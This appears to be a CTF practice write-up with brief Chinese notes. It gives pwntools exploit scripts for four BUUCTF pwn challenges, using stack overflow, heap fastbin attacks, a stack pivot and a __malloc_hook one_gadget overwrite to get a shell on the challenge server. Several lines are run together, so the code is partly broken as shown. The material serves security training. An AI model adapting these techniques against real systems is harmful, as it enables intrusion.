PWN-PRACTICE-BUUCTF-16
- mrctf2020_easyoverflow
- hitcontraining_magicheap
- ciscn_2019_s_4
- 0ctf_2017_babyheap
mrctf2020_easyoverflow
覆盖main函数中的v5,使之为"n0t_r3@11y_f1@g"
from pwn import *
r=remote("node4.buuoj.cn",29521)
payload='a'*0x30+"n0t_r3@11y_f1@g"
r.sendline(payload)
r.interactive()
hitcontraining_magicheap
参考:picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
from pwn import *
io=remote("node4.buuoj.cn",27011)
#io=process("./magicheap")
elf=ELF("./magicheap")def create(size,content):io.sendlineafter("choice :","1")io.sendlineafter("Size of Heap : ",str(size))io.sendlineafter("Content of heap:",content)
def edit(index,size,content):io.sendlineafter("choice :","2")io.sendlineafter("Index :",str(index))io.sendlineafter("Size of Heap : ",str(size))io.sendlineafter("Content of heap : ",content)
def delete(index):io.sendlineafter("choice :","3")io.sendlineafter("Index :",str(index))
def getshell():io.sendlineafter("choice :","4869")heaparray=0x00000000006020C0
fake_chunk_prev_size=heaparray-0x38+5#gdb.attach(io)
#pause()create(0x10,"a"*8)#chunk0
create(0x10,"b"*8)#chunk1
create(0x60,"c"*8)#chunk2#pause()delete(2)#pause()payload="b"*0x10+p64(0)+p64(0x71)+p64(fake_chunk_prev_size)
edit(1,len(payload),payload)#pause()create(0x60,"c"*8)#chunk2
create(0x60,"d"*8)#fake_chunk#pause()payload="d"*3+p64(0x1305+1)
edit(2,len(payload),payload)getshell()io.interactive()
ciscn_2019_s_4
泄露栈地址,然后栈迁移
from pwn import *
context.log_level="debug"
#io=process('./ciscn_s_4')
io=remote('node4.buuoj.cn',28112)
elf=ELF('./ciscn_s_4')input_stk_offset=0x50
leave_ret=0x080484b8
system=0x08048559#gdb.attach(io,"break * 0x080485CD")io.recvuntil('your name?\n')
payload='a'*(40-4)+'b'*4
io.send(payload)
io.recvuntil('bbbb')
io.recv(12)
stk=u32(io.recv(4))
input_stk=stk-input_stk_offset
io.recvuntil('\n')
payload='a'*4+p32(system)+p32(input_stk+12)+'/bin/sh\x00'
payload=payload.ljust(0x28,'\x00')
payload+=p32(input_stk)
payload+=p32(leave_ret)
io.send(payload)
io.interactive()
0ctf_2017_babyheap
参考:0ctf_2017_babyheap
from pwn import *
context.log_level="debug"
io=remote("node4.buuoj.cn",28235)
#io=process("./0ctf_2017_babyheap")
elf=ELF("./0ctf_2017_babyheap")
libc=ELF("./libc-2.23-16-x64.so")
def alloc(size):io.sendlineafter("Command: ","1")io.sendlineafter("Size: ",str(size))
def fill(index,size,content):io.sendlineafter("Command: ","2")io.sendlineafter("Index: ",str(index))io.sendlineafter("Size: ",str(size))io.sendlineafter("Content: ",content)
def free(index):io.sendlineafter("Command: ","3")io.sendlineafter("Index: ",str(index))
def dump(index):io.sendlineafter("Command: ","4")io.sendlineafter("Index: ",str(index))#gdb.attach(io)
#pause()alloc(0x10)#0
alloc(0x10)#1
alloc(0x80)#2
alloc(0x20)#3
alloc(0x60)#4
alloc(0x10)#5#pause()payload="a"*0x18+p64(0xb1)
fill(0,len(payload),payload)
free(1)
alloc(0xa0)#1 calloc
payload="b"*0x10+p64(0)+p64(0x91)
fill(1,len(payload),payload)
free(2)
dump(1)
libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) -0x3c4b78
print(hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]
print(hex(malloc_hook))#pause()free(4)
payload="c"*0x20+p64(0)+p64(0x71)+p64(malloc_hook-0x23)
fill(3,len(payload),payload)
alloc(0x60)#2
alloc(0x60)#4 fake chunk
one_gadget=libc_base+0x4526a
payload="\x00"*0x13+p64(one_gadget)
fill(4,len(payload),payload)#pause()alloc(1)io.interactive()
)
)
